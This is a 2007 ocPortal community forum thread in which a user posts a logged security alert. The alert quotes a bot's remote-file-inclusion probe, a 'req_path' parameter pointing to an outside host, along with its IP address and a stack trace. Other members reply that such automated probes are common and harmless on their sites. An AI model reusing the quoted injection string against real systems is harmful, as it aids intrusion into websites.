HTML Logo by World Wide Web Consortium (www.w3.org). Click to learn more about our commitment to accessibility and standards.

Moving forward with Composr

ocPortal has been relaunched as Composr CMS, which is now in beta. ocPortal 9 will be superseded by Composr 10.

Head over to compo.sr for our new site, and to our migration roadmap. Existing ocPortal member accounts have been mirrored.


hacking attempt, seek advice

Login / Search

 [ Join | More ]
 Add topic 
Posted
Rating:
#36560 (In Topic #8240)
Avatar

Community saint

Is this an issue, error enclosed

Is the a real hacking attempt, I have had about 10 of these errors this week, is there something I need to change to stop this.




A potential hacking attempt has been detected. Please do not be alarmed: approximately half of the suspected attempts are triggered innocently (ocPortal intentionally has a paranoid security model, to give you very high security). Real hacking attempts are almost always caused by 'bots' (computer programs) that automatically crawl the internet looking for websites which may contain vulnerabilities, and then reporting any found vulnerabilities to their 'master' for future exploitation (usually, to assist in spam relaying). If this was a real hack attempt, it has failed - you might want to try and analyse the logged details (in case it gives clues to a real and persistant offender). More information on security is given in the ocPortal documentation. Reason: An invalid parameter ('id' as '18/ocp-103/index.php?req_path=http://dark4ngel.iespana.es/safe.gif?') was sent to a script. Perhaps an XSS or SQL injection attack. IP address: 205.234.201.127 Member ID: 0 Username: Guest User Agent (typically, the web browser): libwww-perl/5.808 Referrer: Operating System: Date and time: 17 November, 2007, 09:56 PM URL: /ocportal/site/index.php?page=iotds&wide=1&type=view&id=18/o cp-103/index.php?req_path=http://dark4ngel.iespana.es/safe.gif? If you believe this suspected hack attempt is neither correct nor benign, but rather actually represents a substantial stability problem in ocPortal, read the information below. Otherwise, do not read on. Below is a stack trace revealing the state ocPortal was in when the error occurred. If this represents a bug in ocPortal's unmodified software, you may want to check ocportal.com for a fix, and if there isn't one, report this as a bug. Please note that merely posting a stack trace is not sufficient for us to solve your problem; the stack trace is just an aid that presents us with additional information. We still need to know the error message, the human situation, version numbers, and any other appropriate information. We apologise for this problem and hope you will work with us so that we can fix it promptly. File '/s101-2/home6/randomas/ocportal/sources/global2.php' Line '1,245' Function 'get_html_trace' Args File '/s101-2/home6/randomas/ocportal/sources/global2.php' Line '1,455' Function 'log_hack_attack_and_exit' Args 'INVALID_PARAMETER_SENT' 'id' '18/ocp-103/index.php?req_path=http://dark4ngel.iespana.es/safe.gif?' File '/s101-2/home6/randomas/ocportal/sources/global2.php' Line '1,518' Function '_param_invalid' Args 'id' '18/ocp-103/index.php?req_path=http://dark4ngel.iespana.es/safe.gif?' false File '/s101-2/home6/randomas/ocportal/site/pages/modules/iotds.ph
p' Line '194' Function 'get_param_integer' Args 'id' File '/s101-2/home6/randomas/ocportal/site/pages/modules/iotds.ph
p' Line '140' Function 'view' Class 'module_iotds' Type '->' Args File '/s101-2/home6/randomas/ocportal/sources/zones.php' Line '323' Function 'run' Class 'module_iotds' Type '->' Args File '/s101-2/home6/randomas/ocportal/sources/site.php' Line '640' Function 'load_module_page' Args 'site/pages/modules/iotds.php' 'iotds' File '/s101-2/home6/randomas/ocportal/sources/site.php' Line '514' Function 'request_page' Args 'iotds' true File '/s101-2/home6/randomas/ocportal/site/index.php' Line '42' Function 'do_site' Args

Back to the top
 
Posted
Rating:
#36561
Avatar

Hi,

It is a hack attempt, but it would never have succeeded. I wouldn't worry too much, there are a lot of mindless bots on the net that go around trying hard-coded hacks to see if they get lucky.


Become a fan of ocPortal on Facebook or add me as a friend. Add me on on Twitter.
Was I helpful?
  • If not, please let us know how we can do better (please try and propose any bigger ideas in such a way that they are fundable and scalable).
  • If so, please let others know about ocPortal whenever you see the opportunity.
  • If my reply is too Vulcan or expressed too much in business-strategy terms, and not particularly personal, I apologise. As a company & project maintainer, time is very limited to me, so usually when I write a reply I try and make it generic advice to all readers. I'm also naturally a joined-up thinker, so I always express my thoughts in combined business and technical terms. I recognise not everyone likes that, don't let my Vulcan-thinking stop you enjoying ocPortal on fun personal projects.
  • If my response can inspire a community tutorial, that's a great way of giving back to the project as a user.
Back to the top
 
Posted
Rating:
#36584
Avatar

Community saint

Thanks Chris.


Back to the top
 
Posted
Rating:
#36602
Avatar

Community saint

 

Chris Graham said

Hi,

It is a hack attempt, but it would never have succeeded. I wouldn't worry too much, there are a lot of mindless bots on the net that go around trying hard-coded hacks to see if they get lucky.
  Yep and thats one of the lovely things about ocPortal that I like very much.
I have gotten a few of these reposts my self.

I run http://otakuplayground.com and am hopping to make themes and other things for ocportal even though I no longer use it for otakuplayground.com I still love it and feel it could go far with the right help. It needs themes and needs people to advertise for it.
Back to the top
 
Posted
Rating:
#36620
Avatar

Well-settled

lolol I got from our site 8 or more a day.....
Back to the top
 
Posted
Rating:
#36623
Avatar

Community saint

Yep common on big sites I think.

I run http://otakuplayground.com and am hopping to make themes and other things for ocportal even though I no longer use it for otakuplayground.com I still love it and feel it could go far with the right help. It needs themes and needs people to advertise for it.
Back to the top
 
Posted
Rating:
#36632
Avatar

Well-settled

hmmm not always big sites, but some sites are interested I think  O_o
Back to the top
 
Posted
Rating:
#36634
Avatar

Community saint

ya you are probably right.

I run http://otakuplayground.com and am hopping to make themes and other things for ocportal even though I no longer use it for otakuplayground.com I still love it and feel it could go far with the right help. It needs themes and needs people to advertise for it.
Back to the top
 
Posted
Rating:
#36654
Avatar

Well-settled

I have 5 sites online and mostlye two sites are daily affected with hacks. So they must be interest for that people to try hacking. :)  

and all sites are working under ocPortal.
Back to the top
 
Posted
Rating:
#36694
Joe
Avatar

Honoured member

Yeah, I usually get at least one hacking attempt a day. My site isn't popular either, so I doubt it has anything to do with popularity.

Back to the top
 
There are too many online users to list.
Control functions:

Quick reply   Contract

Your name:
Your message: